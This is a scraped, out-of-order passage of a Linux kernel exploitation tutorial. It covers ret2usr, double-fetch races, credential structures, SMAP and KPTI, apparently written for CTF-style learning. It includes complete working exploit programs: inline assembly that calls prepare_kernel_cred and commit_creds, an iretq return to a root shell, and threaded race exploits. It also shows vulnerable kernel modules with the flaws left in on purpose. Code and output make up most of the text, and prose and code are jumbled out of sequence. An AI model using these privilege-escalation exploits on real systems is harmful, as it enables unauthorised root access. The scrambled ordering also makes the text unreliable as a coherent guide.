What we have to do is force the kernel to swap back to user mode. The way we do this is by saving the initial userland register state from the start of the program execution, then once we have escalate privileges in kernel mode, we restore the registers to swap to user mode. This reverts execution to the exact state it was before we ever entered kernel mode!

We can store them as follows:

The CS, SS, RSP and RFLAGS registers are stored in 64-bit values within the program. To restore them, we append extra assembly instructions in escalate() for after the privileges are acquired:

Here the GS, CS, SS, RSP and RFLAGS registers are restored to bring us back to user mode (GS via the swapgs instruction). The RIP register is updated to point to get_shell and pop a shell.

If we compile it statically and load it into the initramfs.cpio, notice that our privileges are elevated!

We have successfully exploited a ret2usr!

hashtag
Understanding the restoration

How exactly does the above assembly code restore registers, and why does it return us to user space? To understand this, we have to know what do. The switch to kernel mode is best explained by , or .

  • . The (model-specific registers); at the entry to a kernel-space routine, swapgs enables the process to obtain a pointer to kernel data structures.

    • Has to swap back to user space

  • SS - Stack Segment

GS is changed back via the swapgs instruction. All others are changed back via , the QWORD variant of the iret family of intel instructions. The intent behind iretq is to be the way to return from exceptions, and it is specifically designed for this purpose, as seen in Vol. 2A 3-541 of the :

Returns program control from an exception or interrupt handler to a program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to perform a return from a nested task. (A nested task is created when a CALL instruction is used to initiate a task switch or when an interrupt or exception causes a task switch to an interrupt or exception handler.)

[...]

During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.

As we can see, it pops all the registers off the stack, which is why we push the saved values in that specific order. It may be possible to restore them sequentially without this instruction, but that increases the likelihood of things going wrong as one restoration may have an adverse effect on the following - much better to just use iretq.

hashtag
Final Exploit

The final version

commit_creds           0xffffffff81077390
prepare_kernel_cred    0xffffffff81077510

Kernel

Heavily beta

file-archive
4MB
rop_ret2usr_6.10.zip
archive
arrow-up-right-from-squareOpen
trying to get the previous section working
check the source herearrow-up-right
version 6.1arrow-up-right
version 6.10arrow-up-right
herearrow-up-right

Defines where the stack is stored

  • Must be reverted back to the userland stack

  • RSP

    • Same as above, really

  • CS - Code Segment

    • Defines the memory location that instructions are stored in

    • Must point to our user space code

  • RFLAGS - various thingsarrow-up-right

  • file-archive
    4MB
    rop_ret2usr.zip
    archive
    arrow-up-right-from-squareOpen
    KASLR
    we'll cover soon
    all of the registersarrow-up-right
    a literal StackOverflow postarrow-up-right
    another onearrow-up-right
    GS - limited segmentationarrow-up-right
    contents of the GS register are swapped one of the MSRsarrow-up-right
    iretqarrow-up-right
    Intel Software Developer’s Manualarrow-up-right
    [    1.472064] BUG: kernel NULL pointer dereference, address: 0000000000000000
    [    1.472064] #PF: supervisor read access in kernel mode
    [    1.472064] #PF: error_code(0x0000) - not-present page
    [    1.472064] PGD 22d9067 P4D 22d9067 PUD 22da067 PMD 0 
    [    1.472064] Oops: Oops: 0000 [#1] SMP
    [    1.472064] CPU: 0 PID: 32 Comm: exploit Tainted: G        W  O       6.10.0-rc5 #7
    [    1.472064] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
    [    1.472064] RIP: 0010:commit_creds+0x29/0x180
    [    1.472064] Code: 00 f3 0f 1e fa 55 48 89 e5 41 55 65 4c 8b 2d 9e 80 fa 7e 41 54 53 4d 8b a5 98 05 00 00 4d 39 a5 a0 05 00 00 0f 85 3b 01 00 00 <48> 8b 07 48 89 fb 48 85 c0 0f 8e 2e 01 07
    [    1.472064] RSP: 0018:ffffc900000d7e30 EFLAGS: 00000246
    [    1.472064] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: ffffffff81077390
    [    1.472064] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 0000000000000000
    [    1.472064] RBP: ffffc900000d7e48 R08: ffffffff818a7a28 R09: 0000000000004ffb
    [    1.472064] R10: 00000000000000a5 R11: ffffffff818909b8 R12: ffff88800219b480
    [    1.472064] R13: ffff888002202e00 R14: 0000000000000000 R15: 0000000000000000
    [    1.472064] FS:  000000001b323380(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
    [    1.472064] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    [    1.472064] CR2: 0000000000000000 CR3: 00000000022d7000 CR4: 00000000000006b0
    [    1.472064] Call Trace:
    [    1.472064]  <TASK>
    [    1.472064]  ? show_regs+0x64/0x70
    [    1.472064]  ? __die+0x24/0x70
    [    1.472064]  ? page_fault_oops+0x14b/0x420
    [    1.472064]  ? search_extable+0x2b/0x30
    [    1.472064]  ? commit_creds+0x29/0x180
    [    1.472064]  ? search_exception_tables+0x4f/0x60
    [    1.472064]  ? fixup_exception+0x26/0x2d0
    [    1.472064]  ? kernelmode_fixup_or_oops.constprop.0+0x58/0x70
    [    1.472064]  ? __bad_area_nosemaphore+0x15d/0x220
    [    1.472064]  ? find_vma+0x30/0x40
    [    1.472064]  ? bad_area_nosemaphore+0x11/0x20
    [    1.472064]  ? exc_page_fault+0x284/0x5c0
    [    1.472064]  ? asm_exc_page_fault+0x2b/0x30
    [    1.472064]  ? abort_creds+0x30/0x30
    [    1.472064]  ? commit_creds+0x29/0x180
    [    1.472064]  ? x64_sys_call+0x146c/0x1b10
    [    1.472064]  ? do_syscall_64+0x50/0x110
    [    1.472064]  ? entry_SYSCALL_64_after_hwframe+0x4b/0x53
    [    1.472064]  </TASK>
    [    1.472064] Modules linked in: kernel_rop(O)
    [    1.472064] CR2: 0000000000000000
    [    1.480065] ---[ end trace 0000000000000000 ]---
    [    1.480065] RIP: 0010:commit_creds+0x29/0x180
    [    1.480065] Code: 00 f3 0f 1e fa 55 48 89 e5 41 55 65 4c 8b 2d 9e 80 fa 7e 41 54 53 4d 8b a5 98 05 00 00 4d 39 a5 a0 05 00 00 0f 85 3b 01 00 00 <48> 8b 07 48 89 fb 48 85 c0 0f 8e 2e 01 07
    [    1.484065] RSP: 0018:ffffc900000d7e30 EFLAGS: 00000246
    [    1.484065] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: ffffffff81077390
    [    1.484065] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 0000000000000000
    [    1.484065] RBP: ffffc900000d7e48 R08: ffffffff818a7a28 R09: 0000000000004ffb
    [    1.484065] R10: 00000000000000a5 R11: ffffffff818909b8 R12: ffff88800219b480
    [    1.484065] R13: ffff888002202e00 R14: 0000000000000000 R15: 0000000000000000
    [    1.484065] FS:  000000001b323380(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
    [    1.484065] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    [    1.484065] CR2: 0000000000000000 CR3: 00000000022d7000 CR4: 00000000000006b0
    [    1.488065] Kernel panic - not syncing: Fatal exception
    [    1.488065] Kernel Offset: disabled
    [    1.488065] ---[ end Kernel panic - not syncing: Fatal exception ]---
    [    1.480065] RIP: 0010:commit_creds+0x29/0x180
    $ gdb kernel_rop.ko
    pwndbg> target remote :1234
    pwndbg> b *0xffffffff81077390
    pwndbg> info reg rdi
    rdi            0x0                 0
    pwndbg> info reg rax
    rax            0x0                 0
    struct cred *prepare_kernel_cred(struct task_struct *daemon)
    {
    	const struct cred *old;
    	struct cred *new;
    
    	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
    	if (!new)
    		return NULL;
    
    	kdebug("prepare_kernel_cred() alloc %p", new);
    
    	if (daemon)
    		old = get_task_cred(daemon);
    	else
    		old = get_cred(&init_cred);
    
    	validate_creds(old);
    
    	*new = *old;
    	new->non_rcu = 0;
    	atomic_long_set(&new->usage, 1);
    	set_cred_subscribers(new, 0);
    	get_uid(new->user);
    	get_user_ns(new->user_ns);
    	get_group_info(new->group_info);
    
    	// [...]
    	
    	if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
    		goto error;
    
    	put_cred(old);
    	validate_creds(new);
    	return new;
    
    error:
    	put_cred(new);
    	put_cred(old);
    	return NULL;
    }
    struct cred *prepare_kernel_cred(struct task_struct *daemon)
    {
    	const struct cred *old;
    	struct cred *new;
    
    	if (WARN_ON_ONCE(!daemon))
    		return NULL;
    
    	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
    	if (!new)
    		return NULL;
    
    	kdebug("prepare_kernel_cred() alloc %p", new);
    
    	old = get_task_cred(daemon);
    
    	*new = *old;
    	new->non_rcu = 0;
    	atomic_long_set(&new->usage, 1);
    	get_uid(new->user);
    	get_user_ns(new->user_ns);
    	get_group_info(new->group_info);
    
    	// [...]
    
    	new->ucounts = get_ucounts(new->ucounts);
    	if (!new->ucounts)
    		goto error;
    
    	if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
    		goto error;
    
    	put_cred(old);
    	return new;
    
    error:
    	put_cred(new);
    	put_cred(old);
    	return NULL;
    }
    if (daemon)
        old = get_task_cred(daemon);
    else
        old = get_cred(&init_cred);
    if (WARN_ON_ONCE(!daemon))
        return NULL;
    static ssize_t rop_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
        char buffer[0x20];
    
        printk(KERN_INFO "Testing...");
        memcpy(buffer, buf, 0x100);
    
        printk(KERN_INFO "Yes? %s", buffer);
    
        return 0;
    }
    ~ # cat /proc/kallsyms | grep cred
    [...]
    ffffffff81066e00 T commit_creds
    ffffffff81066fa0 T prepare_kernel_cred
    [...]
    xor    rdi, rdi
    mov    rcx, 0xffffffff81066fa0
    call   rcx
    mov    rdi, rax
    mov    rcx, 0xffffffff81066e00
    call   rcx
    void escalate() {
        __asm__(
            ".intel_syntax noprefix;"
            "xor rdi, rdi;"
            "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
    	"call rcx;"
            
            "mov rdi, rax;"
    	"movabs rcx, 0xffffffff81066e00;"   // commit_creds
    	"call rcx;"
        );
    }
    // overflow
    uint64_t payload[7];
    
    payload[6] = (uint64_t) escalate;
    
    write(fd, payload, 0);
    void get_shell() {
        system("/bin/sh");
    }
    
    int main() {
        // [ everything else ]
        
        get_shell();
    }
    uint64_t user_cs;
    uint64_t user_ss;
    uint64_t user_rsp;
    uint64_t user_rflags
    
    void save_state() {
        puts("[*] Saving state");
    
        __asm__(
            ".intel_syntax noprefix;"
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_rsp, rsp;"
            "pushf;"
            "pop user_rflags;"
            ".att_syntax;"
        );
    
        puts("[+] Saved state");
    }
    uint64_t user_rip = (uint64_t) get_shell;
    
    void escalate() {
        __asm__(
            ".intel_syntax noprefix;"
            "xor rdi, rdi;"
            "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
    	"call rcx;"
            
            "mov rdi, rax;"
    	"movabs rcx, 0xffffffff81066e00;"   // commit_creds
    	"call rcx;"
    
            // restore all the registers
            "swapgs;"
            "mov r15, user_ss;"
            "push r15;"
            "mov r15, user_rsp;"
            "push r15;"
            "mov r15, user_rflags;"
            "push r15;"
            "mov r15, user_cs;"
            "push r15;"
            "mov r15, user_rip;"
            "push r15;"
            "iretq;"
            ".att_syntax;"
        );
    }
    $ gcc -static -o exploit exploit.c
    [...]
    $ ./run.sh
    ~ $ ./exploit 
    [*] Saving state
    [+] Saved state
    FD: 3
    [*] Returned to userland
    ~ # id
    uid=0(root) gid=0(root)
    // gcc -static -o exploit exploit.c
    
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/mman.h>
    #include <stdint.h>
    
    void get_shell(void){
        puts("[*] Returned to userland");
        system("/bin/sh");
    }
    
    uint64_t user_cs;
    uint64_t user_ss;
    uint64_t user_rsp;
    uint64_t user_rflags;
    
    uint64_t user_rip = (uint64_t) get_shell;
    
    void save_state(){
        puts("[*] Saving state");
    
        __asm__(
            ".intel_syntax noprefix;"
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_rsp, rsp;"
            "pushf;"
            "pop user_rflags;"
            ".att_syntax;"
        );
    
        puts("[+] Saved state");
    }
    
    void escalate() {
        __asm__(
            ".intel_syntax noprefix;"
            "xor rdi, rdi;"
            "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
    	    "call rcx;"
            
            "mov rdi, rax;"
    	    "movabs rcx, 0xffffffff81066e00;"   // commit_creds
    	    "call rcx;"
    
            "swapgs;"
            "mov r15, user_ss;"
            "push r15;"
            "mov r15, user_rsp;"
            "push r15;"
            "mov r15, user_rflags;"
            "push r15;"
            "mov r15, user_cs;"
            "push r15;"
            "mov r15, user_rip;"
            "push r15;"
            "iretq;"
            ".att_syntax;"
        );
    }
    
    int main() {
        save_state();
    
        // communicate with the module
        int fd = open("/dev/kernel_rop", O_RDWR);
        printf("FD: %d\n", fd);
    
        // overflow
        uint64_t payload[7];
    
        payload[6] = (uint64_t) escalate;
    
        write(fd, payload, 0);
    }

    Double-Fetch

    The most simple of vulnerabilities

    A double-fetch vulnerability is when data is accessed from userspace multiple times. Because userspace programs will commonly pass parameters in to the kernel as pointers, the data can be modified at any time. If it is modified at the exact right time, an attacker could compromise the execution of the kernel.

    hashtag
    A Vulnerable Kernel Module

    Let's start with a convoluted example, where all we want to do is change the id that the module stores. We are not allowed to set it to 0, as that is the ID of root, but all other values are allowed.

    The code below will be the contents of the read() function of a kernel. I've removed , but here are the relevant parts:

    The program will:

    • Check if the ID we are attempting to switch to is 0

      • If it is, it doesn't allow us, as we attempted to log in as root

    • Sleep for 1 second (this is just to illustrate the example better, we will remove it later)

    hashtag
    Simple Communication

    Let's say we want to communicate with the module, and we set up a simple C program to do so:

    We compile this statically (as there are no shared libraries on our VM):

    As expected, the id variable gets set to 900 - we can check this in dmesg:

    That all works fine.

    hashtag
    Exploiting a Double-Fetch and Switching to ID 0

    The flaw here is that creds->id is dereferenced twice. What does this mean? The kernel module is passed a reference to a Credentials struct:

    This is a pointer, and that is perhaps the most important thing to remember. When we interact with the module, we give it a specific memory address. This memory address holds the Credentials struct that we define and pass to the module. The kernel does not have a copy - it relies on the user's copy, and goes to userspace memory to use it.

    Because this struct is controlled by the user, they have the power to change it whenever they like.

    The kernel module uses the id field of the struct on two separate occasions. Firstly, to check that the ID we wish to swap to is valid (not 0):

    And once more, to set the id variable:

    Again, this might seem fine - but it's not. What is stopping it from changing inbetween these two uses? The answer is simple: nothing. That is what differentiates userspace exploitation from kernel space.

    hashtag
    A Proof-of-Concept: Switching to ID 0

    Inbetween the two dereferences creds->id, there is a timeframe. Here, we have artificially extended it (by sleeping for one second). We have a race codition - the aim is to switch id in that timeframe. If we do this successfully, we will pass the initial check (as the ID will start off as 900), but by the time it is copied to id, it will have become 0 and we have bypassed the security check.

    Here's the plan, visually, if it helps:

    In the waiting period, we swap out the id.

    circle-info

    If you are trying to compile your own kernel, you need CONFIG_SMP enabled, because we need to modify it in a different thread! Additionally, you need QEMU to have the flag -smp 2 (or more) to enable 2 cores, though it may default to having multiple even without the flag. This example may work without SMP, but that's because of the sleep - when we most onto part 2, with no sleep, we require multiple cores.

    The C program will hang on write until the kernel module returns, so we can't use the main thread.

    With that in mind, the "exploit" is fairly self-explanatory - we start another thread, wait 0.3 seconds, and change id!

    We have to compile it statically, as the VM has no shared libraries.

    Now we have to somehow get it into the file system. In order to do that, we need to first extract the .cpio archive (you may want to do this in another folder):

    Now copy exploit there and make sure it's marked executable. You can then compress the filesystem again:

    Use the newly-created initramfs.cpio to lauch the VM with run.sh. Executing exploit, it is successful!

    circle-info

    Note that the VM loaded you in as root by default. This is for debugging purposes, as it allows you to use utilities such as dmesg to read the kernel module output and check for errors, as well as a host of other things we will talk about. When testing exploits, it's always helpful to fix the init script to load you in as root! Just don't forget to test it as another user in the end.

    The Ultimate Aim of Kernel Exploitation - Process Credentials

    hashtag
    Overview

    Userspace exploitation often has the end goal of code execution. In the case of kernel exploitation, we already have code execution; our aim is to escalate privileges, so that when we spawn a shell (or do anything else) using execve("/bin/sh", NULL, NULL) we are dropped as root.

    To understand this, we have a talk a little about how privileges and credentials work in Linux.

    KASLR

    KASLR is the kernel version of ASLR, randomizing various parts of kernel space to make expoitation more complicated (in the exact same way regular ASLR does so for userspace exploitation).

    TODO

    Random stuff I want to mention somewhere, but too small for its own page

    Discuss sched_yield and CPU affinity.

    Kernel code gets patched at runtime (ch4)

    Heap Structures

    Compare the password to p4ssw0rd

    • If it is, it will set the id variable to the id in the creds structure

    the boilerplate code mentioned previously
    file-archive
    0B
    double_fetch_sleep.zip
    archive
    arrow-up-right-from-squareOpen
    hashtag
    The cred struct

    The cred structarrow-up-right contains all the permissions a task holds. The ones that we care about are typically these:

    These fields are all unsigned int fields, and they represent what you would expect - the UID, GID, and a few other less common IDs for other operations (such as the FSUID, which is checked when accessing a file on the file system). As you can expect, overwriting one or more of these fields is likely a pretty desirable goal.

    circle-info

    Note the __randomize_layout here at the end! This is a compiler flag that tells it to mix the layout up on each load, making it harder to target the structure!

    hashtag
    task_struct

    The kernel needs to store information about each running task, and to do this it uses the task_struct arrow-up-rightstructure. Each kernel task has its own instance.

    The task_struct instances are stored in a linked list, with a global kernel variable init_task pointing to the first one. Each task_struct then points to the next.

    Along with linking data, the task_struct also (more importantly) stores real_cred and cred, which are both pointers to a cred struct. The difference between the two is explained herearrow-up-right:

    In effect, real_cred is the initial credential of the process, and is used by processes acting on the process. cred is the current credential, used to define what the process is allowed to do. We have to keep track of both as some processes care about the initial cred and some about the updated.

    An example of caring about the real_cred instead of cred is in the implementationarrow-up-right of /proc/$PID/status, which displays the real_cred as the owner of a process, even if privileges are elevated (note that __task_structarrow-up-right is a macro to grab real_cred, confusingly). Conversely, setuid executables will modify cred and not real_cred.

    So, which set of credentials do we want to target with an arbitrary write? It will depend on what set is relevant for the purpose, but since you usually want to do be creating new processes (through system or execve), the cred is used. In some cases, real_cred will work too, because it seems as if the pointers initially point to the same structarrow-up-right (though note that this excerpt is not from process creation but copy_processarrow-up-right, which is called by the fork syscallarrow-up-right, so it could differ for new process creation).

    hashtag
    prepare_kernel_cred() and commit_creds()

    As an alternative to overwriting cred structs in the unpredictable kernel heap, we can call prepare_kernel_cred() to generate a new valid cred struct and commit_creds() to overwrite the real_cred and cred of the current task_struct.

    hashtag
    prepare_kernel_cred()

    The function can be found herearrow-up-right, but there's not much to say - it creates a new cred struct called new then destroys the oldarrow-up-right. It returns new.

    If NULL is passed as the argument, it will return a new set of credentials that match the init_task credentialsarrow-up-right, which default to root credentialsarrow-up-right. This is very important, as it means that calling prepare_kernel_cred(0) results in a new set of root creds!

    circle-exclamation

    This last part is different on newer kernel versions - check out Debugging the Kernel Module section!

    hashtag
    commit_creds()

    This function is found herearrow-up-right, but ultimately it will update task->real_cred and task->cred to the new credentials:

    hashtag
    Resources and References

    • Xarkes' Baby Kernel 2 writeuparrow-up-right

    • TeamItaly's FamilyRecipes writeuparrow-up-right

    #define PASSWORD    "p4ssw0rd"
    
    typedef struct {
        int id;
        char password[10];
    } Credentials;
    
    static int id = 1001;
    
    static ssize_t df_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
        Credentials *creds = (Credentials *)buf;
    
        printk(KERN_INFO "[Double-Fetch] Reading password from user...");
    
        if (creds->id == 0) {
            printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
            return -1;
        }
    
        // to increase reliability
        msleep(1000);
    
        if (!strcmp(creds->password, PASSWORD)) {
            id = creds->id;
            printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
            return id;
        }
    
        printk(KERN_ALERT "[Double-Fetch] Password incorrect!");
        return -1;
    }
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    typedef struct {
        int id;
        char password[10];
    } Credentials;
    
    int main() {
        int fd = open("/dev/double_fetch", O_RDWR);
        printf("FD: %d\n", fd);
    
        Credentials creds;
        creds.id = 900;
        strcpy(creds.password, "p4ssw0rd");
    
        int res_id = write(fd, &creds, 0);    // last parameter here makes no difference
        printf("New ID: %d\n", res_id);
    
        return 0;
    }
    gcc -static -o exploit exploit.c
    $ dmesg
    [...]
    [    3.104165] [Double-Fetch] Password correct! ID set to 900
    Credentials *creds = (Credentials *)buf;
    if (creds->id == 0) {
        printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
        return -1;
    }
    if (!strcmp(creds->password, PASSWORD)) {
        id = creds->id;
        printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
        return id;
    }
    // gcc -static -o exploit -pthread exploit.c
    
    #include <fcntl.h>
    #include <pthread.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    void *switcher(void *arg);
    
    typedef struct {
        int id;
        char password[10];
    } Credentials;
    
    int main() {
        // communicate with the module
        int fd = open("/dev/double_fetch", O_RDWR);
        printf("FD: %d\n", fd);
    
        // use a random ID and set the password correctly
        Credentials creds;
        creds.id = 900;
        strcpy(creds.password, "p4ssw0rd");
    
        // set up the switcher thread
        // pass it a pointer to `creds`, so it can modify it
        pthread_t thread;
    
        if (pthread_create(&thread, NULL, switcher, &creds)) {
            fprintf(stderr, "Error creating thread\n");
            return -1;
        }
    
        // now we write the cred struct to the module
        // it should be swapped after about .3 seconds by switcher
        int res_id = write(fd, &creds, 0);
    
        // write returns the id we switched to
        // if all goes well, that is 0
        printf("New ID: %d\n", res_id);
    
        // finish thread cleanly
        if (pthread_join(thread, NULL)) {
            fprintf(stderr, "Error joining thread\n");
            return -1;
        }
    
        return 0;
    }
    
    void *switcher(void *arg) {
        Credentials *creds = (Credentials *)arg;
    
        // wait until the module is sleeping - don't want to change it BEFORE the initial ID check!
        sleep(0.3);
    
        creds->id = 0;
    }
    $ gcc -static -o exploit -pthread exploit.c
    $ cpio -i -F initramfs.cpio
    $ find . -not -name *.cpio | cpio -o -H newc > initramfs.cpio
    ~ # ./exploit 
    FD: 3
    New ID: 0
    struct cred {
    	/* ... */
    	
    	kuid_t		uid;		/* real UID of the task */
    	kgid_t		gid;		/* real GID of the task */
    	kuid_t		suid;		/* saved UID of the task */
    	kgid_t		sgid;		/* saved GID of the task */
    	kuid_t		euid;		/* effective UID of the task */
    	kgid_t		egid;		/* effective GID of the task */
    	kuid_t		fsuid;		/* UID for VFS ops */
    	kgid_t		fsgid;		/* GID for VFS ops */
    	
    	/* ... */
    } __randomize_layout;
    struct task_struct {
        	/* ... */
        
    	/*
    	 * Pointers to the (original) parent process, youngest child, younger sibling,
    	 * older sibling, respectively.  (p->father can be replaced with
    	 * p->real_parent->pid)
    	 */
    
    	/* Real parent process: */
    	struct task_struct __rcu	*real_parent;
    
    	/* Recipient of SIGCHLD, wait4() reports: */
    	struct task_struct __rcu	*parent;
    
    	/*
    	 * Children/sibling form the list of natural children:
    	 */
    	struct list_head		children;
    	struct list_head		sibling;
    	struct task_struct		*group_leader;
    
    	/* ... */    
    
    	/* Objective and real subjective task credentials (COW): */
    	const struct cred __rcu		*real_cred;
    
    	/* Effective (overridable) subjective task credentials (COW): */
    	const struct cred __rcu		*cred;
    
        	/* ... */
    };
    /*
     * The security context of a task
     *
     * The parts of the context break down into two categories:
     *
     *  (1) The objective context of a task.  These parts are used when some other
     *	task is attempting to affect this one.
     *
     *  (2) The subjective context.  These details are used when the task is acting
     *	upon another object, be that a file, a task, a key or whatever.
     *
     * Note that some members of this structure belong to both categories - the
     * LSM security pointer for instance.
     *
     * A task has two security pointers.  task->real_cred points to the objective
     * context that defines that task's actual details.  The objective part of this
     * context is used whenever that task is acted upon.
     *
     * task->cred points to the subjective context that defines the details of how
     * that task is going to act upon another object.  This may be overridden
     * temporarily to point to another security context, but normally points to the
     * same context as task->real_cred.
     */
    rcu_assign_pointer(task->real_cred, new);
    rcu_assign_pointer(task->cred, new);

    Double-Fetch without Sleep

    Removing the artificial sleep

    hashtag
    Overview

    In reality, there won't be a 1-second sleep for your race condition to occur. This means we instead have to hope that it occurs in the assembly instructions between the two dereferences!

    This will not work every time - in fact, it's quite likely to not work! - so we will instead have two loops; one that keeps writing 0 to the ID, and another that writes another value - e.g. 900 - and then calling write. The aim is for the thread that switches to 0 to sync up so perfectly that the switch occurs inbetween the ID check and the ID "assignment".

    hashtag
    Analysis

    If we check the source, we can see that there is no msleep any longer:

    hashtag
    Exploitation

    Our exploit is going to look slightly different! We'll create the Credentials struct again and set the ID to 900:

    Then we are going to write this struct to the module repeatedly. We will loop it 1,000,000 times (effectively infinite) to make sure it terminates:

    If the ID returned is 0, we won the race! It is really important to keep in mind exactly what the "success" condition is, and how you can check for it.

    Now, in the second thread, we will constantly cycle between ID 900 and 0. We do this in the hope that it will be 900 on the first dereference, and 0 on the second! I make this loop infinite because it is a thread, and the thread will be killed when the program is (provided you remove pthread_join()! Otherwise your main thread will wait forever for the second to stop!).

    Compile the exploit and run it, we get the desired result:

    Look how quick that was! Insane - two fails, then a success!

    hashtag
    Race Analysis

    You might be wondering how tight the race window can be for exploitation - well, had a race of two assembly instructions:

    The dereferences [rbx] have just one assembly instruction between, yet we are capable of racing. THAT is just how tight!

    SMAP

    Supervisor Memory Access Protection

    SMAP is a more powerful version of SMEP. Instead of preventing code in user space from being accessed, SMAP places heavy restrictions on accessing user space at all, even for accessing data. SMAP blocks the kernel from even dereferencing (i.e. accessing) data that isn't in kernel space unless it is a set of very specific functions.

    For example, functions such as strcpy or memcpy do not work for copying data to and from user space when SMAP is enabled. Instead, we are provided the functions copy_from_user and copy_to_user, which are allowed to briefly bypass SMAP for the duration of their operation. These functions also have additional hardening against attacks such as buffer overflows, with the function __copy_overflow acting as a guard against them.

    This means that whether you interact using write/read or ioctl, the structs that you pass via pointers all get copied to kernel space using these functions before they are messed around with. This also means that double-fetches are even more unlikely to occur as all operations are based on the snapshot of the data that the module took when copy_from_user was called (unless copy_from_user is called on the same struct multiple times).

    Like SMEP, SMAP is controlled by the CR4 register, in this case the 21st bit. It is also , so overwriting CR4 does nothing, and instead we have to work around it. There is no specific "bypass", it will depend on the challenge and will simply have to be accounted for.

    Enabling SMAP is just as easy as SMEP:

    Sometimes it needs to be disabled instead, in which case the option is nosmap.

    hashtag
    Stac and Clac Instructions

    TODO

    hashtag
    Putting Exploit Data Into Kernel Memory instead of Userspace

    TODO

    KPTI

    Kernel Page Table Isolation

    is designed to protect against attacks that abuse the shared user/kernel address space. Originally called KAISER, it is a mitigation originally created to prevent -style microarchitectural vulnerabilities.

    KPTI separates the page tables for user space and kernel space, creating two sets.

    • The first set, used by the kernel, includes a complete mapping of user space that the kernel can use for things like copy_to_user(). This page table has the NX bit set for userspace memory.

    Compiling, Customising and booting the Kernel

    Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.

    circle-info

    This isn't necessary for learning how to write kernel exploits - all the important parts will be provided! This is just to help those hoping to write challenges of their own, or perhaps set up their own VMs for learning purposes.

    hashtag
    Prerequisites

    The user set maps the minimum amount of kernel virtual memory possible (e.g. exception handlers and code required for the user to transition to the kernel).

    You can disable KPTI from the command line via the nopti argument. It is also automatically disabled if the CPU is not affected by meltdown.

    hashtag
    Consequences and Bypasses

    When in the user context, the kernel is not fully mapped. This doesn't affect most of our exploits, since they are executed in kernel mode.

    However, when in kernel mode, userspace is mapped as non-executable. This means that we can't return to an escalate() function we defined via iretq. The solution to this is to swap page tables back to user ones.

    To achieve this, we can abuse a function of use that is descriptively called swapgs_restore_regs_and_return_to_usermode. Disassembling it (TODO!), we see that is starts with a load of pop instructions before a few mov and push and then a page table switch and a swapgs and iretq. We can jump to after the pop instructions to avoid having to fill those in. This is commonly called a KPTI Trampoline.

    TODO example

    hashtag
    Bypassing KPTI via a SIGSEGV Handler

    Trying to return to user mode via iretq without switching page tables results in a SIGSEGV rather than a kernel crash, because we are in userspace.

    An alternative method is therefore to use a SIGSEGV handler - the exploit gets root privileges, then tries to access userland and triggers a SIGSEGV. The kernel fault handler with switch the page tables for us when dispatching to the handler! A good example can be found herearrow-up-right.

    TODO example

    KPTI arrow-up-right
    Meltdownarrow-up-right
    file-archive
    0B
    double_fetch_no_sleep.zip
    archive
    arrow-up-right-from-squareOpen
    gnote from TokyoWesterns CTF 2019arrow-up-right
        -cpu qemu64,+smep,+smap
    pinned
    if (creds->id == 0) {
        printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
        return -1;
    }
    
    printk("[Double-Fetch] Attempting login...");
    
    if (!strcmp(creds->password, PASSWORD)) {
        id = creds->id;
        printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
        return id;
    }
    Credentials creds;
    creds.id = 900;
    strcpy(creds.password, "p4ssw0rd");
    // don't want to make the loop infinite, just in case
    for (int i = 0; i < 1000000; i++) {
        // now we write the cred struct to the module
        res_id = write(fd, &creds, 0);
    
        // if res_id is 0, stop the race
        if (!res_id) {
            puts("[+] ID is 0!");
            break;
        }
    }
    void *switcher(void *arg) {
        volatile Credentials *creds = (volatile Credentials *)arg;
    
        while (1) {
            creds->id = 0;
            creds->id = 900;
        }
    }
    ~ $ ./exploit 
    FD: 3
    [    2.140099] [Double-Fetch] Attempted to log in as root!
    [    2.140099] [Double-Fetch] Attempted to log in as root!
    [+] ID is 0!
    [-] Finished race
    ; note that rbx is the buf argument, user-controlled
    cmp dword ptr [rbx], 5
    ja default_case
    mov eax, [rbx]
    mov rax, jump_table[rax*8]
    jmp rax
    circle-info

    There may be other requirements, I just already had them. Check herearrow-up-right for the full list.

    hashtag
    The Kernel

    hashtag
    Cloning

    Use --depth 1 to only get the last commit.

    hashtag
    Customise

    Remove the current compilation configurations, as they are quite complex for our needs

    Now we can create a minimal configuration, with almost all options disabled. A .config file is generated with the least features and drivers possible.

    We create a kconfig file with the options we want to enable. An example is the following:

    chevron-rightExplanation of Optionshashtag
    • CONFIG_64BIT - compiles the kernel for 64-bit

